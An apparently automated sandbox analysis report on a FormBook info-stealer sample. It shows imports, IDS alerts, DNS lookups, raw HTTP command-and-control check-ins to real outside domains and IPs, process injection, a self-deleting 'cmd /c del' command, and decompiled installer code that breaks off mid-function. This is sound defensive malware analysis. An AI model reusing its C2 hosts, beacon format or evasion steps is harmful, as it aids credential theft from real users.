                                          KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                          USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                          GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                          ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                          Network Behavior

                                          Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/13/21-16:44:25.292716 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.5 | 34.102.136.180
10/13/21-16:44:25.292716 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.5 | 34.102.136.180
10/13/21-16:44:25.292716 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.5 | 34.102.136.180
10/13/21-16:44:25.406375 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49790 | 34.102.136.180 | 192.168.2.5
10/13/21-16:44:46.515561 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.5 | 74.208.236.134
10/13/21-16:44:46.515561 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.5 | 74.208.236.134
10/13/21-16:44:46.515561 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.5 | 74.208.236.134
10/13/21-16:45:02.310893 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 3.64.163.50
10/13/21-16:45:02.310893 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 3.64.163.50
10/13/21-16:45:02.310893 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 3.64.163.50
10/13/21-16:45:07.452062 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49798 | 23.227.38.74 | 192.168.2.5

                                          Network Port Distribution

                                          TCP Packets


                                          UDP Packets


                                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 13, 2021 16:44:14.384646893 CEST | 192.168.2.5 | 8.8.8.8 | 0xfa8a | Standard query (0) | www.highvizpeople.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:20.181121111 CEST | 192.168.2.5 | 8.8.8.8 | 0xa615 | Standard query (0) | www.ttemola.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:25.232558966 CEST | 192.168.2.5 | 8.8.8.8 | 0x4912 | Standard query (0) | www.oddanimalsink.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:30.433674097 CEST | 192.168.2.5 | 8.8.8.8 | 0x7083 | Standard query (0) | www.umgaleloacademy.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:35.857575893 CEST | 192.168.2.5 | 8.8.8.8 | 0xafc8 | Standard query (0) | www.baybeg.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:41.058072090 CEST | 192.168.2.5 | 8.8.8.8 | 0x9ad1 | Standard query (0) | www.itskosi.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:46.351602077 CEST | 192.168.2.5 | 8.8.8.8 | 0xf190 | Standard query (0) | www.crisisinterventionadvocates.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:51.682477951 CEST | 192.168.2.5 | 8.8.8.8 | 0x43b1 | Standard query (0) | www.ishhs.xyz | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:57.200576067 CEST | 192.168.2.5 | 8.8.8.8 | 0xb3d4 | Standard query (0) | www.sfcn-dng.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:45:02.261354923 CEST | 192.168.2.5 | 8.8.8.8 | 0x428 | Standard query (0) | www.everythangbutwhite.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:45:07.338278055 CEST | 192.168.2.5 | 8.8.8.8 | 0xc6a6 | Standard query (0) | www.shopthatlookboutique.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:45:12.463208914 CEST | 192.168.2.5 | 8.8.8.8 | 0x3df5 | Standard query (0) | www.christinegagnonjewellery.com | A (IP address) | IN (0x0001)

                                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 13, 2021 16:44:14.506238937 CEST | 8.8.8.8 | 192.168.2.5 | 0xfa8a | No error (0) | www.highvizpeople.com | | 208.91.197.27 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:20.211018085 CEST | 8.8.8.8 | 192.168.2.5 | 0xa615 | Name error (3) | www.ttemola.com | none | none | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:25.272434950 CEST | 8.8.8.8 | 192.168.2.5 | 0x4912 | No error (0) | www.oddanimalsink.com | oddanimalsink.com | | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:44:25.272434950 CEST | 8.8.8.8 | 192.168.2.5 | 0x4912 | No error (0) | oddanimalsink.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:30.844825983 CEST | 8.8.8.8 | 192.168.2.5 | 0x7083 | Server failure (2) | www.umgaleloacademy.com | none | none | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:41.082652092 CEST | 8.8.8.8 | 192.168.2.5 | 0x9ad1 | No error (0) | www.itskosi.com | | 46.101.121.244 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:41.082652092 CEST | 8.8.8.8 | 192.168.2.5 | 0x9ad1 | No error (0) | www.itskosi.com | | 206.189.50.215 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:46.370044947 CEST | 8.8.8.8 | 192.168.2.5 | 0xf190 | No error (0) | www.crisisinterventionadvocates.com | | 74.208.236.134 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:52.131743908 CEST | 8.8.8.8 | 192.168.2.5 | 0x43b1 | Name error (3) | www.ishhs.xyz | none | none | A (IP address) | IN (0x0001)
Oct 13, 2021 16:44:57.224594116 CEST | 8.8.8.8 | 192.168.2.5 | 0xb3d4 | Name error (3) | www.sfcn-dng.com | none | none | A (IP address) | IN (0x0001)
Oct 13, 2021 16:45:02.290517092 CEST | 8.8.8.8 | 192.168.2.5 | 0x428 | No error (0) | www.everythangbutwhite.com | | 3.64.163.50 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:45:07.366216898 CEST | 8.8.8.8 | 192.168.2.5 | 0xc6a6 | No error (0) | www.shopthatlookboutique.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:45:07.366216898 CEST | 8.8.8.8 | 192.168.2.5 | 0xc6a6 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:45:12.486450911 CEST | 8.8.8.8 | 192.168.2.5 | 0x3df5 | Name error (3) | www.christinegagnonjewellery.com | none | none | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.highvizpeople.com
                                          • www.oddanimalsink.com
                                          • www.itskosi.com
                                          • www.crisisinterventionadvocates.com
                                          • www.everythangbutwhite.com

                                          HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49787 | 208.91.197.27 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 16:44:14.661981106 CEST | 4115 | OUT | GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.highvizpeople.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
Oct 13, 2021 16:44:14.906196117 CEST | 4117 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 13 Oct 2021 14:44:14 GMT
                                          Server: Apache
                                          Set-Cookie: vsid=919vr3816818547928602; expires=Mon, 12-Oct-2026 14:44:14 GMT; Max-Age=157680000; path=/; domain=www.highvizpeople.com; HttpOnly
                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KQL0Qewm/57A7d4wt4OHK1+3N7YmuFf9rlEyC7xrWthCcsfi2zFqQt+3/QwUNakTWu2Rc2ZBUwg9yn9iy5bcVQ==
                                          Keep-Alive: timeout=5, max=102
                                          Connection: Keep-Alive
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49790 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Oct 13, 2021 16:44:25.292716026 CEST | 5623 | OUT | GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.oddanimalsink.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
Oct 13, 2021 16:44:25.406374931 CEST | 5623 | IN | HTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:44:25 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "615f9601-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.5 | 49791 | 46.101.121.244 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:44:41.115659952 CEST | 5625 | OUT | GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.itskosi.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:41.303195953 CEST | 5625 | IN | HTTP/1.1 301 Moved Permanently
                                          cache-control: public, max-age=0, must-revalidate
                                          content-length: 45
                                          content-type: text/plain
                                          date: Wed, 13 Oct 2021 14:44:41 GMT
                                          age: 0
                                          location: https://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo
                                          x-nf-request-id: 01FHX1SM1KDY80SN7YV2CH4TJD
                                          server: Netlify
                                          Data Ascii: Redirecting to https://www.itskosi.com/u9xn/


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.5 | 49793 | 74.208.236.134 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:44:46.515561104 CEST | 5635 | OUT | GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.crisisinterventionadvocates.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:46.664726973 CEST | 5635 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 626
                                          Connection: close
                                          Date: Wed, 13 Oct 2021 14:44:46 GMT
                                          Server: Apache
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          4 | 192.168.2.5 | 49797 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Oct 13, 2021 16:45:02.310893059 CEST | 5649 | OUT | GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.everythangbutwhite.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:45:02.328963041 CEST | 5650 | IN | HTTP/1.1 410 Gone
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:45:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='5; url=http://www.everythangbutwhite.com/' />a </head>9 <body>42 You are being redirected to http://www.everythangbutwhite.coma </body>8</html>0


                                          Code Manipulations

                                          Statistics

                                          CPU Usage


                                          Memory Usage


                                          High Level Behavior Distribution


                                          Behavior


                                          System Behavior

                                          General

                                          Start time:16:42:56
                                          Start date:13/10/2021
                                          Path:C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x400000
                                          File size:288183 bytes
                                          MD5 hash:F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:16:42:58
                                          Start date:13/10/2021
                                          Path:C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x400000
                                          File size:288183 bytes
                                          MD5 hash:F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:16:43:02
                                          Start date:13/10/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:16:43:34
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                          Imagebase:0xe0000
                                          File size:86528 bytes
                                          MD5 hash:746F3B5E7652EA0766BA10414D317981
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x150000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:16:43:38
                                          Start date:13/10/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis


                                            Executed Functions

                                            C-Code - Quality: 78%
                                            			_entry_() {
                                            				intOrPtr _t47;
                                            				CHAR* _t51;
                                            				char* _t54;
                                            				CHAR* _t56;
                                            				void* _t60;
                                            				intOrPtr _t62;
                                            				int _t64;
                                            				char* _t67;
                                            				char* _t68;
                                            				int _t69;
                                            				char* _t71;
                                            				char* _t74;
                                            				intOrPtr _t87;
                                            				int _t91;
                                            				intOrPtr _t93;
                                            				void* _t95;
                                            				void* _t107;
                                            				intOrPtr* _t108;
                                            				char _t111;
                                            				CHAR* _t116;
                                            				char* _t117;
                                            				CHAR* _t118;
                                            				char* _t119;
                                            				void* _t121;
                                            				char* _t123;
                                            				char* _t125;
                                            				char* _t126;
                                            				void* _t128;
                                            				void* _t129;
                                            				intOrPtr _t138;
                                            				char _t147;
                                            
                                            				 *(_t129 + 0x20) = 0;
                                            				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                            				 *(_t129 + 0x1c) = 0;
                                            				 *(_t129 + 0x18) = 0x20;
                                            				SetErrorMode(0x8001); // executed
                                            				if(GetVersion() != 6) {
                                            					_t108 = E00405F28(0);
                                            					if(_t108 != 0) {
                                            						 *_t108(0xc00);
                                            					}
                                            				}
                                            				_t118 = "UXTHEME";
                                            				goto L4;
                                            				while(1) {
                                            					L22:
                                            					_t111 =  *_t56;
                                            					_t134 = _t111;
                                            					if(_t111 == 0) {
                                            						break;
                                            					}
                                            					__eflags = _t111 - 0x20;
                                            					if(_t111 != 0x20) {
                                            						L10:
                                            						__eflags =  *_t56 - 0x22;
                                            						 *((char*)(_t129 + 0x14)) = 0x20;
                                            						if( *_t56 == 0x22) {
                                            							_t56 =  &(_t56[1]);
                                            							__eflags = _t56;
                                            							 *((char*)(_t129 + 0x14)) = 0x22;
                                            						}
                                            						__eflags =  *_t56 - 0x2f;
                                            						if( *_t56 != 0x2f) {
                                            							L20:
                                            							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
                                            							__eflags =  *_t56 - 0x22;
                                            							if(__eflags == 0) {
                                            								_t56 =  &(_t56[1]);
                                            								__eflags = _t56;
                                            							}
                                            							continue;
                                            						} else {
                                            							_t56 =  &(_t56[1]);
                                            							__eflags =  *_t56 - 0x53;
                                            							if( *_t56 == 0x53) {
                                            								__eflags = (_t56[1] | 0x00000020) - 0x20;
                                            								if((_t56[1] | 0x00000020) == 0x20) {
                                            									_t14 = _t129 + 0x18;
                                            									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
                                            									__eflags =  *_t14;
                                            								}
                                            							}
                                            							__eflags =  *_t56 - 0x4352434e;
                                            							if( *_t56 == 0x4352434e) {
                                            								__eflags = (_t56[4] | 0x00000020) - 0x20;
                                            								if((_t56[4] | 0x00000020) == 0x20) {
                                            									_t17 = _t129 + 0x18;
                                            									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
                                            									__eflags =  *_t17;
                                            								}
                                            							}
                                            							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
                                            							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
                                            								 *((intOrPtr*)(_t56 - 2)) = 0;
                                            								_t57 =  &(_t56[2]);
                                            								__eflags =  &(_t56[2]);
                                            								E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t57);
                                            								L25:
                                            								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                            								GetTempPathA(0x400, _t116); // executed
                                            								_t60 = E004030CA(_t134);
                                            								_t135 = _t60;
                                            								if(_t60 != 0) {
                                            									L27:
                                            									DeleteFileA("1033"); // executed
                                            									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
                                            									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
                                            									if(_t62 != 0) {
                                            										L37:
                                            										E00403511();
                                            										__imp__OleUninitialize();
                                            										_t143 =  *((intOrPtr*)(_t129 + 0x10));
                                            										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
